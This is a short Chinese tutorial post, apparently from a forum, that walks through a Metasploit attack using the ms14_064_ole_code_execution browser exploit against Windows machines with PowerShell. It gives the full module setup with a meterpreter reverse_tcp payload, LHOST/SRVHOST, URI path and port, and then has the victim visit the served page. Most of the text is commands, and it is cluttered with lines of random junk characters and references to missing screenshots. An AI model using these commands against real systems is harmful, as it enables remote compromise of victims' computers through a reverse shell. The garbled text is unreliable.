, s" h' g$ a" o
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
$ i5 I. z0 P. l
& n: V* a. [$ B1 ]0 B! I
( i. K' G" k: N& j! M7 A K
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
0 B8 o+ g' `# g4 {) B+ V$ |
- \7 J1 d- u$ [
3 Y5 l+ t2 L4 L% y2 s m! N 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp5 y( K$ |# u0 R+ ^
8 F; J; p# J; P
1 u/ \" X& V5 R# z
set AllowPowershellPrompt true/ G3 [, ^; B# Q q8 _
4 Q; l7 h! F7 N6 u$ g2 C% R$ a- N
- G7 W. p. V8 q4 u. e Set LHOST 192.168.0.109" g, b' Q. C( _
5 z& B4 X; ^! [ l" |
8 H9 x8 n. X; l$ \ `# ]
set SRVHOST 192.168.0.1096 L1 t0 M0 |" K" `4 N
r( i, @8 \; M u8 U& I l9 n' |4 Y
- i/ L7 N4 f' r) _0 S Set uripath share
$ n& T( q7 L# \/ w( Z \
$ g2 E6 |: [" _$ ~& b& y/ {6 N; R; G% f% |8 a8 X. O
Set srvport 80
5 F& E& X9 z3 d; e: ]1 W
) s* P! s9 @% v/ o, m+ V% t
3 x: W% e5 P6 @' @4 V* F
4 w# O" T9 l6 T7 v1 i3 ]9 I
5 Y* z; X& N9 ~, @' Y M; w6 R9 o& U+ x2 ]
* D" u0 b R" N! N5 Z
+ a2 J4 v- y* w9 p# y
3 i6 t7 a) O4 `5 X M$ h6 d; ?
) [* i* N3 ?$ i @+ T* y
# ~) Z7 A2 y5 C2 o0 F8 M( R: v6 ]; d5 \8 V% T
6 D2 T. h9 ~$ Y) n* P/ T
8 E2 I9 B. M% m$ s' V( b
3 d) W8 I4 |- U, H' L6 O 9 J3 y1 q, s/ B' ~2 H- F3 W
' U0 b3 I; W6 \ A- D; R2 I A: w4 E: b {- B2 k0 K+ y5 W" W' g
下面我们来访问本地地址如图:
9 j. Q( S; f& a8 s9 N
7 n8 N ~4 h2 z6 u; U
2 m+ s/ r# e, H2 R! Y: m
4 c2 \1 b1 j' n3 @) t% v
, I" y& z5 n- p {8 y: k9 a- ?( l, R/ v% M
4 Y3 H( |$ r8 M/ Q1 y G2 d
4 s! f' [+ ]5 N. W2 P7 D' B
) L- O+ Y6 u& p' [
( H% \9 J5 Z8 i9 ^& B: L